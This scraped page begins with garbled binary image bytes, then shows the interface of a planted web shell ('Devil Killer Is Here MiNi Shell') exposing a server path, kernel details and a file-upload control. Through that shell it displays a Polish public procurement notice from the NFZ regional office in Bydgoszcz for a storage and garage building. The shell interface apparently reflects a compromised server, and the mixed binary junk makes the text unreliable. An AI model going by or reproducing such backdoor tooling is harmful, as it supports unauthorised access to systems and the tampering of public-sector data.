JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240402/0026705301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa pomieszczenia magazynowo - garażowego przy obiekcie Kujawsko-Pomorskiego Oddziału Wojewódzkiego NFZ w Bydgoszczy przy ul. Łomżyńskiej 33 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KUJAWSKO-POMORSKI ODDZIAŁ WOJEWÓDZKI NARODOWEGO FUNDUSZU ZDROWIA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01581798500136</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łomżyńska 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-863</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">magdalena.kasprowicz@nfz-bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nfz-bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Narodowy Fundusz Zdrowia</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa pomieszczenia magazynowo - garażowego przy obiekcie Kujawsko-Pomorskiego Oddziału Wojewódzkiego NFZ w Bydgoszczy przy ul. Łomżyńskiej 33 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2842e2a0-ea96-11ee-b4e0-4ac387c144e3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00267053</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00443335/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Roboty budowlane w Bydgoszczy ul. Łomżyńska 33- budowa pomieszczenia magazynowo-garażowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2842e2a0-ea96-11ee-b4e0-4ac387c144e3 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się przy użyciu Platformy e-Zamówienia,dostępnej pod adresem:<br/>https://ezamowienia.gov.pl/, oraz poczty elektronicznej (pod warunkiem, że odbiór tak przesłanej informacji został potwierdzony<br/>przez upoważnioną osobę),adresy skrzynek poczty elektronicznej do kontaktu z Wykonawcami: magdalena.kasprowicz@nfz-<br/>bydgoszcz.pl<br/>katarzyna.knopik@nfz-bydgoszcz.pl Komunikacja w postępowaniu odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Możliwość korzystania w postępowaniu z<br/>„Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz<br/>zalogowania się na Platformie e-Zamówienia. Maksymalny rozmiar plików dla „Formularzy do komunikacji” wynosi 150 MB. Ofertę<br/>składa się za pośrednictwem zakładki „Oferty/wnioski”.Nie należy zmieniać nazwy pliku nadanej przez Platformę Zapisany<br/>„Formularz ofertowy” należy otwierać w Adobe Acrobat Reader DC.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca dodaje wybrany z dysku i<br/>uprzednio podpisany „Formularz oferty” w pierwszym polu („Wypełniony formularz oferty”). W kolejnym polu („Załączniki i inne<br/>dokumenty przedstawione w ofercie przez Wykonawcę”) wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z<br/>ofertą Szczegółowo pkt 7 i 10 SWZ.Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>Ofertę składa się, pod rygorem nieważności w formie elektronicznej (opatrzona elektronicznym podpisem kwalifikowanym osoby<br/>upoważnionej do reprezentowania firmy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty,<br/>Zamawiający zaleca używanie podpisu typu wewnętrznego i bezpiecznego znacznika czasu), lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania firmy na zewnątrz i zaciągania zobowiązań w<br/>wysokości odpowiadającej cenie oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA<br/>DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH PRZEZ<br/>NARODOWY FUNDUSZ ZDROWIA W CELU ZWIĄZANYM Z POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO<br/>Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony<br/>osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (Ogólne rozporządzenie o ochronie danych, RODO), podajemy następujące informacje:<br/>● ADMINISTRATOREM DANYCH OSOBOWYCH jest<br/>Narodowy Fundusz Zdrowia z siedzibą w Warszawie, reprezentowany przez Prezesa Narodowego Funduszu Zdrowia, z którym<br/>może się Pan/Pani kontaktować w następujący sposób:<br/>▪ listownie na adres siedziby administratora: 02-528 Warszawa, ul. Rakowiecka 26/30<br/>▪ za pomocą platformy ePUAP: NFZ-Centrala/SkrytkaESP<br/>▪ e-mailem: sekretariat.gpf@nfz.gov.pl<br/>● INSPEKTOR OCHRONY DANYCH<br/>Prezes NFZ wyznaczył Inspektora Ochrony Danych do kontaktu z Panem/Panią w sprawach dotyczących przetwarzania danych<br/>osobowych oraz realizacji praw związanych z przetwarzaniem danych, z którym można kontaktować w następujący sposób:<br/>▪ listownie na adres siedziby administratora: 02-528 Warszawa, ul. Rakowiecka 26/30<br/>▪ za pomocą platformy ePUAP: NFZ-Centrala/SkrytkaESP<br/>▪ e-mailem: iod@nfz.gov.pl<br/>● CEL I PODSTAWA PRZETWARZANIA<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z ww. postępowaniem o<br/>udzielenie zamówienia publicznego.<br/>● ODBIORCY DANYCH OSOBOWYCH<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz<br/>art. 74 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Pzp).<br/>● OKRES PRZECHOWYWANIA DANYCH<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania) PRAW OSÓB, KTÓRYCH DANE DOTYCZĄ<br/>Posiada Pani/Pan:<br/>▪ na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>▪ na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych/Skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą/;<br/>▪ na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>/W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania/;<br/>▪ prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>▪ w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>▪ prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>▪ na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>● INFORMACJA O WYMOGU PODANIA DANYCH<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>● INFORMACJA W ZAKRESIE ZAUTOMATYZOWANEGO PODEJMOWANIA DECYZJI ORAZ PROFILOWANIA<br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO.<br/>Obowiązek informacyjny określony w art. 13 i 14 RODO względem osób trzecich spoczywa także na wykonawcach, którzy<br/>pozyskują dane osobowe osób trzecich w celu przekazania ich zamawiającym w ofertach.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NFZ02-WAG.251.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa pomieszczenia magazynowo- garażowego przy obiekcie K-P OW NFZ w Bydgoszczy przy ul. Łomżyńskiej 33 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45213221-8 - Roboty budowlane w zakresie budowy magazynów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość oferowanej gwarancji na wykonane roboty budowlane oraz instalacje i dostarczone urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu wymagany od wykonawcy dot. zdolności technicznej lub zawodowej:<br/>1. Wykonawca winien wykazać doświadczenie w zrealizowaniu w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej:<br/>dwa zamówienia rodzajem odpowiadającym niniejszemu postępowaniu tj. wykonanie robót budowlanych polegających na<br/>budowie obiektu kubaturowego, o kubaturze brutto nie mniejszej niż 200 m3 każda budowa.<br/>W przypadku składania oferty wspólnej przez wykonawców oraz w przypadku polegania na zdolności podmiotu trzeciego<br/>ww. warunek musi być spełniony w całości przez co najmniej jednego z wykonawców/podmiot trzeci.<br/>2. Wykonawca winien dysponować kluczowymi dla wykonania zamówienia specjalistami, przez których Zamawiający<br/>rozumie na gruncie art. 14 ustawy z 7 lipca 1994 Prawo budowlane (tj Dz. U.z 2023 poz. 682) jedną osobę z:<br/>- uprawnieniami budowlanymi do kierowania bez ograniczeń robotami budowlanymi w specjalności konstrukcyjno-<br/>budowlanej, z minimum 3- letnim doświadczeniem zawodowym w kierowaniu robotami budowlanymi w zakresie swojej<br/>specjalności,<br/>- uprawnieniami budowlanymi do kierowania bez ograniczeń robotami budowlanymi w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, z minimum 3- letnim doświadczeniem zawodowym w<br/>kierowaniu robotami budowlanymi w zakresie swojej specjalności,<br/>- uprawnieniami budowlanymi do kierowania bez ograniczeń robotami budowlanymi w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, z minimum 2- letnim<br/>doświadczeniem zawodowym w kierowaniu robotami budowlanymi w zakresie swojej specjalności.<br/>UWAGA !!!<br/>Osoby, o których mowa w pkt. 2 powinny posiadać uprawnienia do kierowania robotami budowlanymi bez ograniczeń w ww.<br/>specjalnościach zgodnie z ustawą z dnia 07 lipca 1994r. Prawo Budowlane (Dz. U. z 2023 r. poz. 682) oraz<br/>rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019.831) lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12a ustawy Prawo Budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1<br/>ustawy mogą wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( t.j. Dz.U. z 2023r. poz. 334).<br/>Osoby, o których mowa w pkt. 2 muszą należeć do właściwej izby samorządu zawodowego w rozumieniu ustawy z dnia 15<br/>grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. 2023 poz. 551).<br/>Zamawiający dopuszcza dowolne połączenie wskazanych w pkt. 2 funkcji pod warunkiem spełnienia przez osobę łączącą te<br/>funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.<br/>Ocena wykazania spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły „spełnia – nie spełnia”.<br/>Oferta wykonawcy podlegającego wykluczeniu z postępowania lub wykonawcy, który nie spełnił warunków udziału w<br/>postępowaniu podlega odrzuceniu.<br/>Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia, polegać na zdolnościach technicznych innych podmiotów udostępniających<br/>zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>Warunek opisany w pkt. 1 musi być spełniony w całości przez co najmniej jeden podmiot trzeci.<br/>W odniesieniu do warunku doświadczenia wykonawca może polegać na zdolnościach innych podmiotów, jeśli podmioty te<br/>wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane, których wskazane zdolności dotyczą.<br/>Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu a także bada, czy nie<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych zadań dotyczących roboty<br/>budowlanej.<br/>Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający<br/>żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami<br/>albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach innych podmiotów na zasadach określonych w art. 118<br/>ustawy, przedstawienia do tych podmiotów dokumentów wymienionych w pkt. 6.1 SWZ w celu wykazania braku podstaw wykluczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art.109 ust.1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z 